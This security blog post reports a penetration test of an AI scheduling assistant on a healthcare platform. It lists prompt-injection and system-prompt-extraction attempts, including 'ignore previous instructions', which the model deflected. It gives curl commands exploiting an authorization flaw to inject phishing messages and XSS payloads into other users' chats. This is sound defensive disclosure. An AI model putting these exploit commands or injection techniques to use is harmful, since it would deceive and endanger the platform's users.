Sprocket Security | Auditing AI Chat APIs: Beyond Prompt Injection

AI chat features are being bolted onto existing SaaS products at a pace the security guidance hasn't caught up with. The testing advice that's out there - OWASP LLM Top 10, academic prompt injection research, vendor guidance - focuses almost entirely on the language model itself. What almost nobody talks about is the transport layer underneath: the GraphQL mutations, WebSocket subscriptions, and publish/subscribe channels that actually carry the messages between the AI backend, the user's browser, and whatever downstream systems the assistant touches.

On a recent continuous penetration test against a healthcare SaaS platform, we spent a day pulling apart the AI scheduling assistant built into their flagship product. The assistant runs on AWS AppSync with a React frontend and uses the ag-ui protocol for streaming messages back to the client. We tested prompt injection, HTML injection, and system prompt extraction - the standard LLM safety checks. All of it was deflected. What actually broke was the classical API layer: the publish mutations that the AI backend uses to stream responses to the client were exposed in the client-facing GraphQL schema and accepted any sessionGuid from any authenticated user.

That's the pattern this post is about. Prompt injection testing matters, but it's only half the surface. The other half is a Broken Object Level Authorization (BOLA) hole in how publish/subscribe infrastructure gets exposed to client traffic.

Key Takeaways

AI chat features built on GraphQL publish/subscribe infrastructure (AWS AppSync, Hasura, Apollo Federation) often expose the publish mutation in the client-facing schema, turning a server-to-client broadcast channel into a writable endpoint any authenticated user can call.
The vulnerability class is a BOLA on the sessionGuid parameter, also referred to as Insecure Direct Object Reference (IDOR). If the server doesn't verify the caller owns the session before publishing, any authenticated user can inject content into any session - identical to Zendesk's 2025 chat IDOR and HackerOne's Copilot DestroyLlmConversation IDOR.
Testing AI chat features requires classical API authorization testing on the transport layer, not just LLM safety tests. A well-scoped system prompt can deflect prompt injection while the GraphQL mutation underneath has no authorization at all.
Session identifiers used as authorization tokens fail when they leak through logs, monitoring, subscription broadcasts, or adjacent info disclosures. UUIDv4 session GUIDs are not predictable, but practical exploitation rarely requires prediction.
React's JSX output escaping blocked XSS through the chat's chatResponse field. The server accepted <script> and <img onerror> tags, but the frontend rendered them as text. Frontend sanitization does not excuse missing server-side authorization - the payload was still delivered.
OWASP LLM Top 10 2025 frames excessive agency (LLM06) and insecure output handling (LLM05) but stops at the model boundary. The API authorization layer that carries LLM output to the client is not in the framework and rarely tested.

Where AI Chat Security Testing Misses the Mark

The dominant framework for AI chat security is the OWASP Top 10 for LLM Applications. Its entries - prompt injection, insecure output handling, excessive agency, system prompt leakage - are model-layer concerns. They assume the LLM is the interesting target and the infrastructure delivering its output is either trusted or out of scope. And in some cases that’s true.

In practice, the infrastructure is where the bugs are. When a product team adds an AI assistant to an existing SaaS application, they typically wire a language model into the existing API. The LLM runs server-side, streams tokens back to the client through a publish/subscribe channel, and either the backend or the client translates the streamed content into UI updates. That publish channel is the attack surface nobody tests.

The healthcare SaaS platform we tested used AWS AppSync with a standard pattern: a mutation called publishAGUIMessageChunk that takes a sessionGuid and a JSON message payload, and pushes the payload to subscribers of the AGUIMessages subscription filtered by sessionGuid. The AGUI prefix refers to the ag-ui protocol, a generic agent UI framework designed for this exact streaming pattern. It’s a reasonable technical choice. The problem is how the mutation ends up in the schema.

The publish mutation exists so the server-side AI backend can write into the subscription stream that clients consume. It's meant to be called by internal services, not the client. But because it lives in the same AppSync GraphQL schema as the client-facing API, and because AppSync authorization is typically enforced per-mutation through resolver-level checks rather than through schema separation, the mutation is callable by anyone with a valid tenant JWT. If no resolver-level check validates that the caller owns the session, any authenticated user can publish into any session.

How We Found the BOLA

The discovery came from GraphQL introspection. Before we touched the AI features, we pulled the complete mutation list and filtered for anything related to chat, session, or message:

curl -s -X POST '<https://api.example.com/graphql>' \\\\
  -H "Authorization: $TOKEN" \\\\
  -H "tenant-id: $TENANT" \\\\
  -H "Content-Type: application/json" \\\\
  -d '{"query":"{ __type(name: \\\\"Mutation\\\\") { fields { name args { name type { name } } } } }"}' \\\\
  | jq '.data.__type.fields[] | select(.name | test("chat|session|message|agui|scheduler"; "i"))'

The output included the expected client-facing mutations (initializeChatInfo, sendChatMessage) alongside two that stood out: publishAGUIMessage and publishAGUIMessageChunk. Both accepted a sessionGuid as a top-level argument. Neither corresponded to anything the client would normally call - the client subscribes to the message stream, it doesn't publish into it.

Testing cross-user authorization on publishAGUIMessageChunk was straightforward. We obtained a victim's active session GUID from a second browser session and published a message from the attacker's terminal:

curl -s -X POST '<https://api.example.com/graphql>' \\\\
  -H "Authorization: $ATTACKER_TOKEN" \\\\
  -H "tenant-id: $TENANT" \\\\
  -H "Content-Type: application/json" \\\\
  -d '{"query":"mutation { publishAGUIMessageChunk(sessionGuid: \\\\"<VICTIM_SESSION_GUID>\\\\", message: \\\\"{\\\\\\\\\\\\"type\\\\\\\\\\\\": \\\\\\\\\\\\"CUSTOM\\\\\\\\\\\\", \\\\\\\\\\\\"name\\\\\\\\\\\\": \\\\\\\\\\\\"final_state\\\\\\\\\\\\", \\\\\\\\\\\\"value\\\\\\\\\\\\": {\\\\\\\\\\\\"response\\\\\\\\\\\\": {\\\\\\\\\\\\"chatResponse\\\\\\\\\\\\": \\\\\\\\\\\\"URGENT: Your session has expired. Re-authenticate at <https://evil.example.com>.\\\\\\\\\\\\", \\\\\\\\\\\\"status\\\\\\\\\\\\": \\\\\\\\\\\\"active\\\\\\\\\\\\", \\\\\\\\\\\\"quickReply\\\\\\\\\\\\": [\\\\\\\\\\\\"Re-authenticate now\\\\\\\\\\\\"]}}}\\\\") { sessionGuid message } }"}'

The API returned success. The message payload used the same JSON structure the AI's backend produces, so if delivered and rendered, it would appear in the chat UI as a legitimate AI response with functional quick reply buttons.

To confirm the authorization check was missing entirely rather than just misconfigured, we published to a fabricated session GUID that didn't exist:

curl ... -d '{"query":"mutation { publishAGUIMessageChunk(sessionGuid: \\\\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\\\", message: \\\\"test\\\\") { sessionGuid message } }"}'

Success. The fabricated GUID was echoed back. There is no server-side check that the session exists, let alone that the caller owns it. The attacker account used for these tests held only low-privilege scheduling roles - no admin, no AI permissions, no clinical access.

What Prompt Injection Testing Got Right and Wrong

Before finding the BOLA, we ran the prompt injection playbook against the AI. The system prompt was well-scoped: the assistant only handles appointment scheduling. When we asked it to dump its system prompt, list its tools, or ignore previous instructions, it responded with polite deflections back to scheduling tasks.

I appreciate you reaching out! I'm here specifically to help you schedule
appointments. It looks like you might be testing the system, but I'm
focused on helping with real scheduling needs. Would you like to book
an appointment today?

We tried every variation - role-play framing, system-tag prefixes, indirect instructions embedded in natural-language requests - and the assistant consistently refused to break scope. Direct prompt injection was not exploitable.

Indirect prompt injection was also not exploitable, but for a more interesting reason. The intuitive attack was to inject content into the session through the publish BOLA, then call sendChatMessage and watch the LLM read the injected content from its conversation history. That failed. The publish channel and the AI's conversation store are separate. publishAGUIMessageChunk writes into the subscription stream that the client consumes, but the LLM's conversation history is maintained server-side and populated only from the sendChatMessage chatText field. Injecting into the publish channel does not influence the model's subsequent responses.

This is a good security boundary. Whether by accident or design, the product team separated the publish channel from the conversation state, which prevented the BOLA from chaining into prompt injection. It is also a reminder that LLM safety and API authorization are independent problems. The system prompt did its job. The GraphQL schema did not.

What React's Output Escaping Prevented

The payload we were injecting rendered as chatResponse - a field the frontend treats as message text. We tested whether the frontend rendered it as HTML:

curl ... -d '{"query":"mutation { publishAGUIMessageChunk(sessionGuid: \\\\"<VICTIM_SESSION_GUID>\\\\", message: \\\\"{\\\\\\\\\\\\"type\\\\\\\\\\\\": \\\\\\\\\\\\"CUSTOM\\\\\\\\\\\\", \\\\\\\\\\\\"value\\\\\\\\\\\\": {\\\\\\\\\\\\"response\\\\\\\\\\\\": {\\\\\\\\\\\\"chatResponse\\\\\\\\\\\\": \\\\\\\\\\\\"<img src=x onerror=alert(document.domain)>\\\\\\\\\\\\"}}}\\\\") { sessionGuid message } }"}'

The API accepted the payload, but the React frontend rendered the content as literal text rather than HTML. JSX output escaping is on by default and the developers had not opted into dangerouslySetInnerHTML on this field. SVG onload, javascript: URI markdown links, and script tags all behaved the same way: delivered over the wire, escaped in the DOM.

This result is worth stating clearly. The server accepted an XSS payload and happily broadcast it through the publish channel. The reason there is no stored XSS here is that the frontend happens to escape output by default. A single future change - swapping the renderer for a markdown library, adding dangerouslySetInnerHTML to support richer AI responses, or migrating to a different framework - reintroduces the XSS. The server-side authorization bug is independent and remains exploitable regardless of what the frontend does with the data.

This is also a concrete argument against trusting defense-in-depth claims that rely on the frontend. The server should reject unauthorized publishes. React escaping should be a backup, not the primary control.

The initializeChatInfo User Impersonation Companion Bug

The initializeChatInfo mutation has its own authorization gap. It accepts a client-supplied userGuid as the session owner without validating it against the caller's JWT sub claim:

curl -s -X POST '<https://api.example.com/graphql>' \\\\
  -H "Authorization: $ATTACKER_TOKEN" \\\\
  -H "tenant-id: $TENANT" \\\\
  -H "Content-Type: application/json" \\\\
  -d '{"query":"mutation { initializeChatInfo(input: { userGuid: \\\\"<VICTIM_USER_GUID>\\\\", locationGuid: \\\\"<LOC>\\\\", personGuid: \\\\"<PERSON>\\\\", providerGuid: \\\\"<PROVIDER>\\\\" }) { sessionGuid chatResponse } }"}'

The server returns a fresh sessionGuid bound to the victim user, not the caller. This creates a session on the victim's behalf. The victim never sees this session - when they log in and open the chat, the frontend creates its own session with its own GUID, and the impersonated session is orphaned. It's still a real bug (the JWT is not authoritative over the session owner, which is a backend data integrity issue), but it does not directly enable the injection path most people would assume.

This is the kind of nuance that matters in AI chat testing. An API surface can have multiple authorization bugs that interact in non-obvious ways, and the "obvious" attack chain may not work. Testing the full cross-product requires attacking each endpoint independently, then looking for ways to chain them.

Why Session GUIDs Fail as Authorization Tokens

The practical constraint on the publish BOLA is that exploiting it requires the victim's active sessionGuid. The value is a UUIDv4 and is not returned by any query we could find through the client-facing schema - no way to list other users' sessions, no directory of active chats, no way to iterate. We verified this by introspecting every query that returned session-shaped data.

But session GUIDs leak through other channels. A few to check on any engagement:

WebSocket subscription traffic. If the AGUIMessages subscription broadcasts to all connected clients rather than filtering server-side by sessionGuid, the session GUIDs of concurrent users appear in any attacker's WebSocket history.
Log aggregation. CloudWatch, Datadog, Sentry - any monitoring pipeline that captures request/response bodies or WebSocket frames stores session GUIDs. An attacker with read access to observability data does not need to guess.
Adjacent API endpoints. Audit logs, support tools, admin panels. Anywhere a support engineer might look up a user's session for troubleshooting is a potential leak source.
Insider network visibility. A malicious employee on the corporate network can often observe other employees' traffic enough to pull out session identifiers.

Treating session GUIDs as if they were credentials works only if the surface area around the session GUID is small and tightly controlled. In a real production system, the surface is never that small. The authorization check at the publish layer is the only reliable control.

How This Compares to Zendesk, HackerOne Copilot, and Other Public Disclosures

The bug class is not novel. Well-documented precedents:

Zendesk Chat IDOR (2025) - a high-severity IDOR in the Zendesk chat API's POST /sc/sdk/v2/apps/[APP_ID]/conversations/[CONVERSATION_ID]/messages endpoint allowed unauthorized message injection into another user's chat. The root cause is identical: the conversation identifier functioned as an authorization token with no ownership check. See Reco Security Labs coverage.
HackerOne Copilot IDOR - the DestroyLlmConversation GraphQL mutation in HackerOne's unreleased Copilot feature was vulnerable to IDOR on the conversation ID. A GraphQL mutation, an AI chat feature, missing authorization on the identifier. See HackerOne Report #2218334.
AI chatbot IDOR plus prompt injection (2025) - a researcher combined IDOR with prompt injection on an e-commerce AI chatbot to access thousands of customer records. Disclosed in this Medium writeup.
Third-party AI chatbot plugin research (IEEE S&P 2026) - a large-scale study of 17 third-party plugins found 8 that transmitted message history in POST payloads without authentication or integrity checks. See the preprint on arXiv.

Add our finding to the list and the pattern is clear. AI chat features built on any publish/subscribe GraphQL infrastructure need BOLA testing on the identifiers that carry authorization. Product teams that focus LLM security reviews exclusively on the model layer keep missing this bug class.

A Testing Methodology for AI Chat Features

For any engagement involving an AI chat, assistant, or copilot feature, run the following in parallel with prompt injection testing. This is the methodology that would have found this bug on day one:

Introspect the full GraphQL schema. Pull every mutation, query, and subscription. Filter for anything that mentions chat, session, message, agent, agui, conversation, copilot, or assistant. Publish/subscribe mutations designed for server-to-client broadcast should not appear in the client-facing schema.
Test BOLA on every identifier in chat-related mutations. For each mutation that takes a session, conversation, or message identifier, try the attacker's token with a victim's identifier, then with a fabricated identifier. Both should fail. If either succeeds, you have a BOLA.
Test cross-user session creation. Mutations like initializeChatInfo that accept userGuid parameters should reject values that don't match the caller's JWT claim. If they don't, document the impersonation even if it doesn't chain cleanly.
Test XSS through message fields. Inject <img onerror>, SVG onload, and markdown with javascript: URIs into the content that renders as AI output. Test in the actual browser UI - the server accepting the payload is only half the test.
Test prompt injection through injected content. If you can inject into the conversation store (not just the publish channel), prompt injection becomes indirect. Send a follow-up sendChatMessage after injection and see whether the AI's response references the injected content.
Trace session GUID discoverability. Can the attacker's subscription receive another user's GUIDs? Are session GUIDs in URLs, logs, error messages, or support tools? Document the sources - this determines practical exploitability of any BOLA.
Document negative results. Failed prompt injection attempts, filtered XSS, and unreachable chains are evidence too. They narrow the finding to its true shape instead of overselling it.

Conclusion

The security conversation around AI chat features is dominated by the LLM layer - prompt injection, system prompt leakage, model jailbreaks. All of that matters. But it is not a substitute for the classical API authorization testing that should run alongside it. On this engagement, the system prompt successfully deflected every prompt injection attempt we threw at it, and the most impactful bug was still a missing resolver-level check on a GraphQL mutation that was never meant to be client-facing.

Continuous penetration testing caught this because we had time to introspect the full schema and build a methodology that looked past the model. A traditional time-boxed pentest focused on the interesting AI features would have walked away with a prompt injection negative result and called the LLM well-secured. The publish BOLA would have survived.

If your product has added AI chat features on top of an existing GraphQL API, introspect the schema, audit every chat-related mutation for missing authorization, and assume the real bug is in the infrastructure the model is running on. The LLM is the new thing. The bug class is not.

Sprocket Security's continuous penetration testing covers AI-assisted features the same way we cover everything else - full introspection, independent testing of every surface, and the time to follow the non-obvious paths. Learn more about our continuous testing model.

Auditing AI Chat APIs: Beyond Prompt Injection

Key Takeaways

Where AI Chat Security Testing Misses the Mark

How We Found the BOLA

What Prompt Injection Testing Got Right and Wrong

What React's Output Escaping Prevented

The initializeChatInfo User Impersonation Companion Bug

Why Session GUIDs Fail as Authorization Tokens

How This Compares to Zendesk, HackerOne Copilot, and Other Public Disclosures

A Testing Methodology for AI Chat Features

Conclusion

Nate Fair

The Expert-Driven Offensive
Security Platform

Expert-Driven Offensive Security Platform

Our Cookie Policy

Manage Cookies

Use cases

Top Blog Posts

Auditing AI Chat APIs: Beyond Prompt Injection

Key Takeaways

Where AI Chat Security Testing Misses the Mark

How We Found the BOLA

What Prompt Injection Testing Got Right and Wrong

What React's Output Escaping Prevented

The initializeChatInfo User Impersonation Companion Bug

Why Session GUIDs Fail as Authorization Tokens

How This Compares to Zendesk, HackerOne Copilot, and Other Public Disclosures

A Testing Methodology for AI Chat Features

Conclusion

Nate Fair

Explore Latest Content.

Auditing AI Chat APIs: Beyond Prompt Injection

Ahead of the Breach - Gary Lobermier, Lead Adversarial Security Engineer at Northwestern Mutual

Self-Propagating XSS: When Widget Frameworks Become Worm Vectors in Multi-Tenant Platforms

The Expert-Driven Offensive Security Platform

Expert-Driven Offensive Security Platform

The Expert-Driven Offensive
Security Platform